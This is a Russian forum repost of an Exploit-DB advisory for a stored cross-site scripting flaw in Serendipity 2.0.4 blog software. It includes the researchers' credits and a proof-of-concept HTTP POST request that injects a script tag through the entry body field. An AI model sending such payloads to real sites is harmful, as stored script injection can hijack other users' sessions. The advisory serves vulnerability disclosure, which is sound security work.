- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40650
- Проверка EDB
-
- Пройдено
- Автор
- BESIM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-10-31
S9Y Serendipity 2.0.4 - Cross-Site Scripting
Код:
========================================
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
Application: Serendipity
Class: Sensitive Information disclosure
Versions Affected: <= latest version
Vendor URL: http://docs.s9y.org/
Software URL: http://docs.s9y.org/downloads.html
Bugs: Persistent Cross Site Scripting
Date of found: 29.10.2016
Author: Besim
========================================
2.CREDIT
========================================
Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
Stored Cross Site Scripting (No Admin Required)
========================================
1) Editor login panel
2) User click 'New Entry'
3) Attacker(normal user) enter xss payload to 'Entry Body' input
4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>
### HTTP Request ###
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Cookie: ---
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
- POST DATA
serendipity[action]=admin
&serendipity[adminModule]=entries
&serendipity[adminAction]=save
&serendipity[id]=
&serendipity[timestamp]=1477314176
&serendipity[preview]=false
&serendipity[token]=324fa32a404e03de978d9a18f86a3338
&serendipity[title]=New Page
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
&serendipity[extended]=
&serendipity[chk_timestamp]=1477314176
&serendipity[new_timestamp]=2016-10-24 15:02
&serendipity[isdraft]=false
&serendipity[allow_comments]=true
&serendipity[had_categories]=1
&serendipity[propertyform]=true
&serendipity[properties][access]=public
&ignore_password=
&serendipity[properties][entrypassword]=
&serendipity[change_author]=4- Источник
- www.exploit-db.com
